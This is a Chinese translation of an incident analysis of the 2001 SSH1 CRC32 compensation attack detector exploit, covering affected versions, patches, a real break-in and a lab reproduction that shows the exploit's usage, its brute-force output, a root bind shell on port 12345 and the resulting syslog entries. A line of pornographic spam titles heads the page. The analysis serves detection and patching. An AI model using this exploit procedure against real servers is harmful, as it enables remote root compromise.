亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 學院 > 開發設計 > 正文

對于SSH crc32 compensation attack detector exploit 的分析

2019-11-17 05:51:24
字體:
來源:轉載
供稿:網友
由于SSH crc32 compensation attack detector eXPloit代碼的流傳開來,對于
SSH的掃描也越來越多,這是一份統計報表:

+------------+------------+----------+----------+-----------+
| date | #PRobes| #Sources | #Targets | #Scanners |
+------------+------------+----------+----------+-----------+
| 2001-10-03 | 1466 |45|987 | |
| 2001-10-04 |319 |25|212 | |
| 2001-10-05 |825 |22|783 | |
| 2001-10-06 |86552 |27|86305 | |
| 2001-10-07 | 7564 |29| 7429 | |
| 2001-10-08 | 2506 |29| 2449 | |
| 2001-10-09 | 1010 |18|263 | |
| 2001-10-10 |480 |39|307 | |
| 2001-10-11 |978 |31|504 | |
| 2001-10-12 |436 |21|311 | |
| 2001-10-13 | 6731 |27| 6353 | |
| 2001-10-14 | 1411 |29| 1084 | |
| 2001-10-15 |936 |34|723 | |
| 2001-10-16 | 1358 |40| 1256 | |
| 2001-10-17 | 1098 |36|899 | |
| 2001-10-18 | 1779 |31| 1438 | |
| 2001-10-19 |19722 |28|19573 | 7 |
| 2001-10-20 |25539 |21|25419 | 3 |
| 2001-10-21 | 6796 |26| 6750 | 9 |
| 2001-10-22 |807 |30|482 | 5 |
| 2001-10-23 |578 |49|327 | 6 |
| 2001-10-24 | 2198 |39| 2025 | 9 |
| 2001-10-25 | 2368 |31| 1759 | 6 |
| 2001-10-26 |712 |37|591 | 7 |
| 2001-10-27 |463 |30|297 | 8 |
| 2001-10-28 |495 |30|263 | 5 |
| 2001-10-29 |478 |37|399 | 5 |
| 2001-10-30 | 1154 |48| 1051 | 5 |
| 2001-10-31 | 1998 |46| 1047 | 5 |
| 2001-11-01 |66660 |46|66386 | 5 |
| 2001-11-02 | 1514 |40|926 | 5 |
| 2001-11-03 | 2142 |36| 2047 | 8 |
| 2001-11-04 | 1233 |26|781 | 9 |
+------------+------------+----------+----------+-----------+

鑒于此情況,編譯整理David A. Dittrich <dittrich@cac.washington.edu> 文章(http://staff.washington.edu/dittrich/misc/ssh-analysis.txt)供大家參考和修補。

-------------------------------------------------------------------------------

概述
==================

此漏洞最開始由CORE-SDI組織在securityfocus.com上的BUGTRAQ上發布了他們安全
公告CORE-20010207,日期為2001,2月8號:

http://www.securityfocus.com/advisories/3088

漏洞的簡單描述就是:ssh1守護程序中所帶的一段代碼中存在一個整數溢出問題。問題出在
deattack.c,此程序由CORE SDI開發,用來防止SSH1協議受到CRC32補償攻擊。

由于在detect_attack()函數中錯誤的將一個16位的無符號變量當成了32位變量來使用,導致表索引溢出問題。

這將答應一個攻擊者覆蓋內存中的任意位置的內容,攻擊者可能遠程獲取root權限。

其他組織也陸續公布了一些對這個SSH 漏洞的分析和建議如:

  http://xforce.iss.net/alerts/advise100.php

  http://razor.bindview.com/publish/advisories/adv_ssh1crc.Html
  http://www.securityfocus.com/bugid=2347

而在2001年10月21號Jay Dyson在incidents@securityfocus.com郵件列表上聲明
有不少信息顯示有人在掃描RipE 網絡段的SSH服務器:

  http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1

然后更甚的是在vuln-dev@securityfocus.com郵件列表中提示Newsbytes.com中
有新聞描述有人愿付$1000美金的人提供此攻擊工具。還有沒有確認的傳聞針對
Solaris 8/SPARC SSH.com 1.2.26-31 系統的攻擊代碼也存在。聞名的安全站點
securitynewsportal.com就被這個漏洞攻擊,下面地址是被黑截圖:

  http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/

最近TESO發布了關于這些攻擊代碼的信息,你可以在下面的地址查看:

  http://www.team-teso.org/sshd_statement.php


下面是受影響的SSH版本:

SSH Communications Security SSH 2.x and 3.x (if SSH Version 1 fallback is enabled)
SSH Communications Security SSH 1.2.23-1.2.31
F-Secure SSH versions prior to 1.3.11-2
OpenSSH versions prior to 2.3.0 (if SSH Version 1 fallback is enabled)
OSSH 1.5.7

不過供給商已經為系統提供補丁信息,大家可以參考如下地址:

  http://www.ssh.com/prodUCts/ssh/advisories/ssh1_crc-32.cfm
  http://openssh.org/security.html
  http://www.cisco.com/warp/public/707/SSH-multiple-pub.html


---------------------------------------------------------------------------

攻擊行為的分析
=====================

2001年10月6日,攻擊者從Netherlands網絡段使用crc32 compensation attack
detector漏洞攻擊程序入侵了一臺UW網絡中使用了OpenSSH 2.1.1的Redhat linux
系統,漏洞描述如CERT VU#945216所述:

  http://www.kb.cert.org/vuls/id/945216

系統中一系列操作系統命令被替換成木馬程序以提供以后再次進入并清除了所有
日志系統。第二臺SSH服務器運行在39999/tcp高端口,系統入侵后被用來掃描其他
UW以外的網絡以獲得更多的運行OpenSSH 2.1.1的系統。

通過一些恢復操作對這個漏洞程序進行了分析:

這個攻擊代碼基于OpenSSH 2.2.0版本(這個是2.1.1之后的版本,對crc32
compensation attack detection function進行了修補),不過針對OpenSSH
2.1.1進行攻擊,其攻擊代碼也可以使用在ssh.com 1.2.31版本(針對其他SSH
協議1 和版本的測試尚無完成)。

攻擊代碼對針對如下系統:

  linux/x86 ssh.com 1.2.26-1.2.31 rhl
  linux/x86 openssh 1.2.3 (maybe others)
  linux/x86 openssh 2.2.0p1 (maybe others)
  freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl


雖然這個攻擊代碼可以對多個平臺系統進行攻擊,這里攻擊者只掃描22/tcp端口,
然后連接這些系統獲得響應的版本程序并只對"OpenSSH_2.1.1"繼續進一步操作。
這些掃描使用快速SYN掃描,使用來自t0rn root kit中的工具。

對破壞的系統進行分析發現已經有47067個地址被掃描,而在這些地址中,有1244
個主機被鑒別存在此漏洞,攻擊者成功的在8月8日系統離線之前利用此漏洞進入
4個主機。

這個攻擊者代碼對使用訪問控制限制(如, SSH.com的"AllowHosts" 或者 "DenyHosts"
設置) 或者包過濾(如, ipchains, iptables, ipf) 的系統不能正常工作,因為這些
會要求交換Public keys。

-------------------------------------------------------------------------

對攻擊者代碼實時的分析
============================

此攻擊代碼在隔離的網絡段進行測試,使用了網絡地址為10.10.10.0/24,攻擊
主機使用了10.10.10.10 而有漏洞的服務主機為 10.10.10.3。

有漏洞的服務主機系統運行了在Red Hat Linux6.0(Kernel 2.2.16-3 on an i586)
的SSH.com的 1.2.31 版本。

而攻擊主機運行了Fred Cohen's PLAC[1] (從CD-ROM引導的Linux 2.4.5 系統),
文件使用"nc"(Netcat)[2]拷貝到系統中.

攻擊一方再現
=========================

當以沒有任何參數運行攻擊代碼的時候會顯示使用信息:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh



linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src


greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/


**please pick a type**


Usage: ./ssh host [options]
Options:
  -p port
  -b base Base address to start bruteforcing distance, by default 0x1800,
goes as high as 0x10000
  -t type
  -d debug mode
  -o Add this to delta_min


types:


0: linux/x86 ssh.com 1.2.26-1.2.31 rhl
1: linux/x86 openssh 1.2.3 (maybe others)
2: linux/x86 openssh 2.2.0p1 (maybe others)
3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

被測試系統在系統端口2222上運行著SSH.com version 1.2.31 (未修補)程序,并
把syslog日志重定向獨立的文件sshdx.log.

這里選擇了類型type 0和2222 攻擊端口:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0



linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src


greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/


...........................
bruteforced distance: 0x3200
bruteforcing distance from h->partial packet buffer on stack
..............^[[A................|////////////!
bruteforced h->ident buff distance: 5bfbed88


trying retloc_delta: 35
....!
found high Words of possible return address: 808
trying to exploit
....
trying retloc_delta: 37
.!
found high words of possible return address: 805
trying to exploit
....
trying retloc_delta: 39
......
trying retloc_delta: 3b

......
trying retloc_delta: 3d
!
found high words of possible return address: 804
trying to exploit
....
trying retloc_delta: 3f
......
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

這里看來,攻擊攻擊相似被"停止"了,返回被攻擊系統查看卻發現被開了后門。

被測試系統一方再現
=======================

在利用漏洞之前,被測試系統顯示標準SSH守護程序運行在22/tcp端口,要被
測試的應用程序運行在2222/tcp端口,兩個都在監聽狀態,而且標準SSH守護
程序有一個外部連接(10.10.10.2:33354),通過netstat查看如下:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

而在攻擊程序"停止"以后,再用netstat查看網絡監聽狀態如下:




=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:2222 10.10.10.10:32965 ESTABLISHED
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

發現有新的服務在12345/tcp端口監聽。

返回攻擊者主機,使用netstat查看網絡狀態,發現程序使用了暴力猜測地址
方式攻擊:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED
tcp 0 0 10.10.10.3:2222 10.10.10.10:33075 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33074 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33072 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33071 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33069 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33067 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33066 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33064 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33063 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33062 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33061 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33060 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33059 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33058 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33056 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33055 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33053 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33051 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33050 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33048 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33047 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33046 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33042 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33041 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33040 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33039 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33038 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33036 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33035 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33034 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33033 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33032 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33030 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33029 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33028 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33027 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33024 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33023 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33022 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33021 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33020 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33016 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33014 TIME_WAIT
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

而使用LiSt Open Files ("lsof")[4]工具顯示被測試的SSH守護程序開啟了一個
新的監聽端口:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# lsof -p 9364
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 9364 root cwd DIR 3,3 1024 2 /
sshd 9364 root rtd DIR 3,3 1024 2 /
sshd 9364 root txt REG 3,3 655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1
sshd 9364 root mem REG 3,3 340771 30722 /lib/ld-2.1.3.so
sshd 9364 root mem REG 3,3 370141 31107 /lib/libnsl-2.1.3.so
sshd 9364 root mem REG 3,3 66231 31103 /lib/libcrypt-2.1.3.so
sshd 9364 root mem REG 3,3 47008 31113 /lib/libutil-2.1.3.so
sshd 9364 root mem REG 3,3 4101836 31102 /lib/libc-2.1.3.so
sshd 9364 root mem REG 3,3 246652 31109 /lib/libnss_files-2.1.3.so
sshd 9364 root mem REG 3,3 252234 31111 /lib/libnss_nisplus-2.1.3.so
sshd 9364 root mem REG 3,3 255963 31110 /lib/libnss_nis-2.1.3.so
sshd 9364 root mem REG 3,3 67580 31108 /lib/libnss_dns-2.1.3.so
sshd 9364 root mem REG 3,3 169720 31112 /lib/libresolv-2.1.3.so
sshd 9364 root 0u CHR 1,3 4110 /dev/null
sshd 9364 root 1u CHR 1,3 4110 /dev/null
sshd 9364 root 2u CHR 1,3 4110 /dev/null
sshd 9364 root 3u inet 10202 TCP *:12345 (LISTEN)

sshd 9364 root 4u inet 10197 TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

很明顯,攻擊程序成功利用此漏洞獲得ROOT SHELL,并綁定了一個高端TCP端口。
這樣攻擊者可以使用任何"telnet"或者"rc"工具連接到此端口并以超級用戶的
方式執行任意命令,如下所示:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac ~ >> telnet 10.10.10.3 12345
Trying 10.10.10.3...
Connected to 10.10.10.3.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
date;
Thu Nov 1 18:04:42 PST 2001
netstat -an --inet;
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:12345 10.10.10.10:33077 ESTABLISHED
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
exit;
Connection closed by foreign host.
root@plac ~ >>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[注重]:使用telnet要加";"號,而nc連接不需要。

等攻擊者退出以后,被測試系統網絡狀態返回正常:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

假如syslog日志功能開啟了,連接和暴力測試的信息全部會記錄下來(注重,這個是
對SSH.com 1.2.31在Red Hat LInux 6.0上的測試 -- 日志標志會和記錄OpenSSH
不一樣):

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Nov 1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298
Nov 1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299
Nov 1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300
Nov 1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301
Nov 1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302
Nov 1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303
Nov 1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304
Nov 1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305
Nov 1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306
Nov 1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host.
Nov 1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307

Nov 1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308
Nov 1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309
Nov 1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310
Nov 1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311
Nov 1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312
Nov 1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313
Nov 1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314
Nov 1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host.
Nov 1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315
Nov 1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316
Nov 1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317
Nov 1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318
Nov 1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319
Nov 1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320
Nov 1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321
Nov 1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322
Nov 1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323
Nov 1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324
Nov 1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325
Nov 1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326
Nov 1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327
Nov 1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328
Nov 1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329
Nov 1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330
Nov 1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331
Nov 1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332
Nov 1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333
Nov 1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334
Nov 1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335
Nov 1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336
Nov 1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337
Nov 1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338
Nov 1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339
Nov 1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340
Nov 1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341
Nov 1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342
Nov 1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343

Nov 1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344
Nov 1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345
Nov 1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346
Nov 1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347
Nov 1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348
Nov 1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349
Nov 1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350
Nov 1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351
Nov 1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352
Nov 1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353
Nov 1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354
Nov 1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355
Nov 1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356
Nov 1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357
Nov 1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358
Nov 1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359
Nov 1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360
Nov 1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361
Nov 1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362
Nov 1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363
Nov 1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364
Nov 1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365
Nov 1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366
Nov 1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367
Nov 1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368
Nov 1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369
Nov 1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370
Nov 1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371
Nov 1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372
Nov 1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373
Nov 1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374
Nov 1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375
Nov 1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376
Nov 1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377
Nov 1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378
Nov 1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379
Nov 1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380
Nov 1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381
Nov 1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382
Nov 1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383
Nov 1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384
Nov 1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385
Nov 1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386
Nov 1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387
Nov 1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388
Nov 1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389
Nov 1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390
Nov 1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391
Nov 1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392
Nov 1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393
Nov 1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394
Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395
Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396
Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397
Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398
